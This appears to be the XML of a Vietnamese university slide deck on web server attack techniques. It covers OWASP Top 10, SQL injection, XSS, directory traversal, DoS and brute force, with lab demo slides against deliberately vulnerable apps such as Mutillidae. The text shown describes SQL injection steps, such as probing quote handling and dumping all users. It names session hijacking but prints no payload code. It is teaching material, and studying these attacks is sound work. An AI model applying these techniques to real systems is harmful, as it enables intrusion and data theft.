              </a:rPr>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17E4C817-33B2-45E3-9CD7-4B77B60CA0BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="912340" y="1849619"/>
            <a:ext cx="7319319" cy="3503408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31672457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21BF-FA31-90B6-1066-065745B7D44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87522CB-D2AE-32BC-C621-D9DCD3BCA76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7EDBAA83-DDBF-E9A5-CA63-EB4ACDC3C5F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422189" y="93945"/>
            <a:ext cx="9029700" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.	Mô phỏng các bước thực hiện demo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.1.	Tấn Công SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA35953-3A56-701A-7922-C89B9DAA63D9}"/>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97</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C0D64E-4937-C13B-F079-39854235D2AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2045761"/>
            <a:ext cx="8915400" cy="1490151"/>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en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3.2.1.1.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>số</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Payload kiểm tra xem dữ liệu nhập vào được lập trình viên webserver đặt trong cặp dấu  ‘ ’ hay là  “ ”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3856609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8038-4D70-0A22-185E-A5359309D21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AE4A1F-D790-339F-4414-32A89269BC7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5BF972A9-005C-A7D1-9597-555E0758B339}"/>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3D1AA860-4383-0150-8750-88C6C12A2E17}"/>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98</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA03BAAD-8D1D-83BD-EB90-EE027FD39D51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="886426"/>
            <a:ext cx="8915400" cy="1028486"/>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KIểm tra lệnh SQL  đặt iput ở trong cập dấu  ‘’ hay không</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5284A06-79A4-FFC5-4C88-05F3A2F9554F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196545" y="1902607"/>
            <a:ext cx="6750908" cy="2189262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{003AC424-26C9-0378-F31D-BFC6EC30C26E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457198" y="4304338"/>
            <a:ext cx="8229601" cy="982026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3270649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B13BF-E9DE-A665-F355-68FCAF25465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350FF00-22AF-571E-AF0C-C74851D50A22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="52197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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E67529B5-6A76-E31D-E7FC-7B1E87FF43DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422189" y="93945"/>
            <a:ext cx="9029700" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.1.	Tấn Công SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4AAC9B1-D7C0-33C5-2849-E448136478A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100">
              <a:lnSpc>
                <a:spcPts val="1375"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-25" dirty="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A25CB7C-4D13-AD70-7CA0-E871FAAA3252}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="886426"/>
            <a:ext cx="8915400" cy="2054408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104139" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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Thông báo lỗi cho ta biết họ đặt input người dùng trong cặp dấu ‘’. Từ đó ta truyền payload sau để tìm kiếm tất cả các user. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Truy vấn toàn bộ dữ liệu người dùng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD954DBF-CB28-12FA-56A2-2C27D0D22677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181100" y="2966577"/>
            <a:ext cx="6781800" cy="2556051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1882056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574</TotalTime>
  <Words>7657</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:10)</PresentationFormat>
  <Paragraphs>658</Paragraphs>
  <Slides>224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224</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="232" baseType="lpstr">
      <vt:lpstr>MS Mincho</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CÁC KỸ THUẬT TẤN CÔNG WEBSERVER</vt:lpstr>
      <vt:lpstr>1. GIỚI THIỆU TỔNG QUAN 1.1. Các Khái Niệm Cơ Bản Về An Toàn Thông Tin </vt:lpstr>
      <vt:lpstr>Confidentiality (Tính bảo mật):</vt:lpstr>
      <vt:lpstr>Integrity (Tính toàn vẹn): </vt:lpstr>
      <vt:lpstr>Availability (Tính sẵn sàng)</vt:lpstr>
      <vt:lpstr>Bốn tính chất bổ sung: </vt:lpstr>
      <vt:lpstr>1.1.2. Phân loại đối tượng tấn công </vt:lpstr>
      <vt:lpstr>1.1.2. Phân loại đối tượng tấn công </vt:lpstr>
      <vt:lpstr>1.1.2. Phân loại đối tượng tấn công </vt:lpstr>
      <vt:lpstr>1.2. Vòng đời tấn công mạng (Cyber Kill Chain)  </vt:lpstr>
      <vt:lpstr>Mô hình này bao gồm 7 giai đoạn cốt lõi: </vt:lpstr>
      <vt:lpstr>Mô hình này bao gồm 7 giai đoạn cốt lõi: </vt:lpstr>
      <vt:lpstr>Mô hình này bao gồm 7 giai đoạn cốt lõi: </vt:lpstr>
      <vt:lpstr>Mô hình này bao gồm 7 giai đoạn cốt lõi: </vt:lpstr>
      <vt:lpstr>1.3. Tổng quan về các lỗ ổng bảo mật Web phổ biến 1.3.1. Giới thiệu về OWASP Top 10  </vt:lpstr>
      <vt:lpstr>1.3.2. Phân tích các lỗ hổng chính trong OWASP Top 10-2021  </vt:lpstr>
      <vt:lpstr>1.3.2. Phân tích các lỗ hổng chính trong OWASP Top 10-2021  </vt:lpstr>
      <vt:lpstr>1.3.2. Phân tích các lỗ hổng chính trong OWASP Top 10-2021  </vt:lpstr>
      <vt:lpstr>1.3.2. Phân tích các lỗ hổng chính trong OWASP Top 10-2021  </vt:lpstr>
      <vt:lpstr>1.3.2. Phân tích các lỗ hổng chính trong OWASP Top 10-2021  </vt:lpstr>
      <vt:lpstr>1.3.2. Phân tích các lỗ hổng chính trong OWASP Top 10-2021  </vt:lpstr>
      <vt:lpstr>1.3.2. Phân tích các lỗ hổng chính trong OWASP Top 10-2021  </vt:lpstr>
      <vt:lpstr>2. CÁC KỸ THUẬT TẤN CÔNG WEB SERVER </vt:lpstr>
      <vt:lpstr>2.1. Tấn công SQL Injection (SQLi) 2.1.1. Giới thiệu về SQL Injection </vt:lpstr>
      <vt:lpstr>2.1.2. Các loại Lỗi thường gặp dẫn đến SQL Injection </vt:lpstr>
      <vt:lpstr>2.1.2. Các loại Lỗi thường gặp dẫn đến SQL Injection </vt:lpstr>
      <vt:lpstr>2.1.3.Các dạng tấn công SQL Injection Dạng 1: Tấn công SQL Injection trong Băng Tần (In-band SQL Injection)  </vt:lpstr>
      <vt:lpstr>Dạng 1: Tấn công SQL Injection trong Băng Tần (In-band SQL Injection)  </vt:lpstr>
      <vt:lpstr>Dạng 1: Tấn công SQL Injection trong Băng Tần (In-band SQL Injection)  </vt:lpstr>
      <vt:lpstr>Dạng 1: Tấn công SQL Injection trong Băng Tần (In-band SQL Injection)  </vt:lpstr>
      <vt:lpstr>Dạng 2: Tấn công SQL Injection Mù (Blind SQL Injection):   </vt:lpstr>
      <vt:lpstr>Dạng 2: Tấn công SQL Injection Mù (Blind SQL Injection):   </vt:lpstr>
      <vt:lpstr>Dạng 2: Tấn công SQL Injection Mù (Blind SQL Injection):   </vt:lpstr>
      <vt:lpstr>Dạng 3: Tấn công SQL Injection Ngoài Băng Tần (Out-of-Band SQL Injection - OOB):  </vt:lpstr>
      <vt:lpstr>Dạng 3: Tấn công SQL Injection Ngoài Băng Tần (Out-of-Band SQL Injection - OOB):  </vt:lpstr>
      <vt:lpstr>Dạng 4: Tấn công SQL Dựa trên Stacked Queries (Chồng Lệnh):  </vt:lpstr>
      <vt:lpstr>Dạng 5: Tấn công SQL bằng Stored Procedures (Thủ tục Lưu trữ): </vt:lpstr>
      <vt:lpstr>2.1.4. Tác động của các cuộc tấn công SQL Injection thành công  </vt:lpstr>
      <vt:lpstr>2.1.4. Tác động của các cuộc tấn công SQL Injection thành công  </vt:lpstr>
      <vt:lpstr>2.1.5. Biện pháp pháp phòng chông tấn công SQL Injection   </vt:lpstr>
      <vt:lpstr>2.1.5. Biện pháp pháp phòng chông tấn công SQL Injection   </vt:lpstr>
      <vt:lpstr>2.1.5. Biện pháp pháp phòng chông tấn công SQL Injection   </vt:lpstr>
      <vt:lpstr>2.2. Tấn công Cross-Site Scripting (XSS) 2.2.1. Giới thiệu về Cross-Site Scripting (XSS)    </vt:lpstr>
      <vt:lpstr>2.2.1. Giới thiệu về Cross-Site Scripting (XSS)    </vt:lpstr>
      <vt:lpstr>2.2.2. Các dạng tấn công và dặc điểm     </vt:lpstr>
      <vt:lpstr>2.2.2. Các dạng tấn công và dặc điểm     </vt:lpstr>
      <vt:lpstr>2.2.2. Các dạng tấn công và dặc điểm     </vt:lpstr>
      <vt:lpstr>2.2.2. Các dạng tấn công và dặc điểm     </vt:lpstr>
      <vt:lpstr>2.2.3. Tác hại của cuộc tấn công XSS </vt:lpstr>
      <vt:lpstr>2.2.3. Tác hại của cuộc tấn công XSS </vt:lpstr>
      <vt:lpstr>2.2.4. Biện pháp phòng chống và bảo vệ chủ yếu</vt:lpstr>
      <vt:lpstr>2.2.4. Biện pháp phòng chống và bảo vệ chủ yếu</vt:lpstr>
      <vt:lpstr>2.3. Tấn công Directory Traversal và File Inclusion 2.3.1.Giới thiệu về Directory Traversal  </vt:lpstr>
      <vt:lpstr>2.3.1.Giới thiệu về Directory Traversal  </vt:lpstr>
      <vt:lpstr>2.3.2. Cơ chế hoạt động của Directory Traversal 2.3.2.1. Nguyên lý cơ bản:</vt:lpstr>
      <vt:lpstr>2.3.3. Các kỹ thuật bypass phổ biến </vt:lpstr>
      <vt:lpstr>2.3.4. File Upload Vulnerability </vt:lpstr>
      <vt:lpstr>2.3.5. Các kỹ thuật bypass phổ biến </vt:lpstr>
      <vt:lpstr>2.4.Tấn công từ chối dịch vụ (DoS/DDoS) 2.4.1. DoS/DDoS là gì?  </vt:lpstr>
      <vt:lpstr>2.4.1. DoS/DDoS là gì?  </vt:lpstr>
      <vt:lpstr>2.4.2. Phân biệt DoS và DDoS</vt:lpstr>
      <vt:lpstr>2.4.3. Các dạng tấn công theo lớp</vt:lpstr>
      <vt:lpstr>2.4.3. Các dạng tấn công theo lớp</vt:lpstr>
      <vt:lpstr>2.4.3. Các dạng tấn công theo lớp</vt:lpstr>
      <vt:lpstr>2.5. Tấn công dò mật khẩu (Brute-Force Attack) 2.5.1. Cơ chế hoạt động và các biến thể </vt:lpstr>
      <vt:lpstr>2.5.1. Cơ chế hoạt động và các biến thể</vt:lpstr>
      <vt:lpstr>2.5.2. Các loại hình tấn công phổ biến:</vt:lpstr>
      <vt:lpstr>3. THỰC HÀNH VÀ ĐÁNH GIÁ BẢOMẬT 3.1 Giới thiệu về Kiểm thử Xâm nhập (Pentesting)</vt:lpstr>
      <vt:lpstr>3.1 Giới thiệu về Kiểm thử Xâm nhập (Pentesting)</vt:lpstr>
      <vt:lpstr>3.1 Giới thiệu về Kiểm thử Xâm nhập (Pentesting)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Các công cụ và môi trường thực hành 3.2.1. Máy ảo </vt:lpstr>
      <vt:lpstr>3.2.1. Máy ảo</vt:lpstr>
      <vt:lpstr>3.2.1. Máy ảo</vt:lpstr>
      <vt:lpstr>3.2.2. Công cụ:</vt:lpstr>
      <vt:lpstr>3.2.2. Công cụ:</vt:lpstr>
      <vt:lpstr>3.2.2. Công cụ:</vt:lpstr>
      <vt:lpstr>3.2.2. Công cụ:</vt:lpstr>
      <vt:lpstr>3.2.2. Công cụ:</vt:lpstr>
      <vt:lpstr>3.2.2. Công cụ:</vt:lpstr>
      <vt:lpstr>3.2.2. Công cụ:</vt:lpstr>
      <vt:lpstr>3.2.2. Công cụ:</vt:lpstr>
      <vt:lpstr>3.2.2. Công cụ:</vt:lpstr>
      <vt:lpstr>3.3. Mô phỏng các bước thực hiện demo 3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3. Mô phỏng các bước thực hiện demo 3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>3.3. Mô phỏng các bước thực hiện demo 3.3.1. Tấn Công SQL Injection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>3.3.1.2. Đánh cắp Phiên làm việc (Session Hijacking)</vt:lpstr>
      <vt:lpstr>3.3.1.2. Đánh cắp Phiên làm việc (Session Hijacking)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>3.3.1.3. Khai thác Lỗ hổng SQL Injection (SQLi)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>3.3.1.3. K hai thác Lỗ hổng SQL Injection (SQLi)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3.3.2. Tấn công Cross-Site Scripting (XSS)  3.3.2.1. Tấn công Cross-Site Scripting (XSS) cơ bản với DVWA.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3.2.1.2. Tấn công Cross-Site Scripting (XSS) thực hiện JavaScript từ máy Attacker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3.3.3.Tấn công Directory Tranversal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3.3.4. Tấn công Brute Force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3.4. Quy trình tấn công toàn diện một WebServer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helene</dc:creator>
  <cp:lastModifiedBy>Huỳnh Quốc Huy</cp:lastModifiedBy>
  <cp:revision>152</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-21T10:26:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-22T13:27:47Z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2024-09-05T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>Microsoft® PowerPoint® for Microsoft 365</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2025-10-21T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Producer">
    <vt:lpwstr>3-Heights(TM) PDF Security Shell 4.8.25.2 (http://www.pdf-tools.com)</vt:lpwstr>
  </property>
</Properties>
</file>